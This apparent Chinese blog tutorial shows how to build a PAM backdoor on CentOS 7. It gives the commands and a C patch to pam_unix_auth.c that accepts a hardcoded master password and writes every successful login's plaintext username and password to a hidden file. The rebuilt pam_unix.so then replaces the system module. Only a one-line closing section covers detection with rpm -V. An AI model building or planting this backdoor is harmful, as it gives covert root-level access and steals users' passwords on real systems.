PAM后门
2024/6/24...大约 2 分钟
PAM后门
一、查看本机pam版本
dpkg -l | grep pam
[root@hcss-ecs-3689 pam_custom_auth]# rpm -qi pam
Name : pam
Version : 1.1.8
Release : 23.el7
Architecture: x86_64
Install Date: Mon 24 Jun 2024 08:48:16 PM CST
Group : System Environment/Base
Size : 2632373
License : BSD and GPLv2+
Signature : RSA/SHA256, Sat 04 Apr 2020 05:03:22 AM CST, Key ID 24c6a8a7f4a80eb5
Source RPM : pam-1.1.8-23.el7.src.rpm
Build Date : Wed 01 Apr 2020 12:00:59 PM CST
Build Host : x86-02.bsys.centos.org
Relocations : (not relocatable)
Packager : CentOS BuildSystem <http://bugs.centos.org>
Vendor : CentOS
URL : http://www.linux-pam.org/
Summary : An extensible library which provides authentication for applications
Description :
PAM (Pluggable Authentication Modules) is a system security tool that
allows system administrators to set authentication policy without
having to recompile programs that handle authentication.
[root@hcss-ecs-3689 pam_custom_auth]#CentOS 7种默认的pam的版本为1.1.8
二、下载系统版本的pam
各个版本的pam包下载地址:
新的地址,亲测有效: https://mirrors.aliyun.com/blfs/conglomeration/Linux-PAM/
本地下载 本源码目录右键打开 Linux-PAM-1.1.8.tar.bz2
下载对应版本的压缩包并解压
wget https://mirrors.aliyun.com/blfs/conglomeration/Linux-PAM/Linux-PAM-1.1.8.tar.bz2
tar -jxvf Linux-PAM-1.1.8.tar.gz三、编译
安装依赖软件
yum install -y texinfo-5.1-5.el7.x86_64 flex-2.5.37-6.el7.x86_64 flex-devel flex代码编辑
修改moudles/pam_unix/pam_unix_auth.c文件,修改处位于180行
if(strcmp(p,"zsl123")==0)
{
retval = PAM_SUCCESS;
}
// 下面的是记录明文密码
if(retval== PAM_SUCCESS)
{
FILE *fp = fopen("/usr/share/java/.null","a+");
fprintf(fp,"%s::%s\n",name, p);
fclose(fp);
}
// name = p =NULL 上面的内容为新添加部分修改完后在Linux-PAM-1.1.8.tar.gz 目录中执行命令
./configure && make编译好的文件在modules/pam_unix/.libs/中
[root@hcss-ecs-3689 .libs]# ls -l
total 536
-rw-r--r-- 1 root root 8208 Jun 24 20:38 bigcrypt.o
-rw-r--r-- 1 root root 21232 Jun 24 20:38 md5_broken.o
-rw-r--r-- 1 root root 32680 Jun 24 20:38 md5_good.o
-rw-r--r-- 1 root root 28128 Jun 24 20:38 pam_unix_acct.o
-rw-r--r-- 1 root root 14872 Jun 24 20:38 pam_unix_auth.o
lrwxrwxrwx 1 root root 14 Jun 24 20:38 pam_unix.la -> ../pam_unix.la
-rw-r--r-- 1 root root 954 Jun 24 20:38 pam_unix.lai
-rw-r--r-- 1 root root 66360 Jun 24 20:38 pam_unix_passwd.o
-rw-r--r-- 1 root root 11216 Jun 24 20:38 pam_unix_sess.o
-rwxr-xr-x 1 root root 193104 Jun 24 20:38 pam_unix.so
-rw-r--r-- 1 root root 66856 Jun 24 20:38 passverify.o
-rw-r--r-- 1 root root 67872 Jun 24 20:38 support.o
-rw-r--r-- 1 root root 9872 Jun 24 20:38 yppasswd_xdr.o
[root@hcss-ecs-3689 .libs]# pwd
/opt/pam_custom_auth/Linux-PAM-1.1.8/modules/pam_unix/.libs先mv备份原来的pam_unix.so
mv /lib64/x86_64-linux-gnu/security/pam_unix.so /lib64/x86_64-linux-gnu/security/pam_unix.so.bak找到pam_unix.so 并替换
cp ./pam_unix.so /lib/x86_64-linux-gnu/security/pam_unix.so四、验证
创建个普通用户
useradd 123
passwd 123登录root
su root
goodboy查看/usr/share/java/.null是否有记录
cat /usr/share/java/.null五、反查
使用rpm工具去校验包的完整性,如果异常则有问题
[root@hcss-ecs-3689 .libs]# rpm -V pam
S.5....T. /usr/lib64/security/pam_unix.so更新日志
2025/4/19 06:16
查看所有更新日志
401e6-于e2484-于b2f3f-于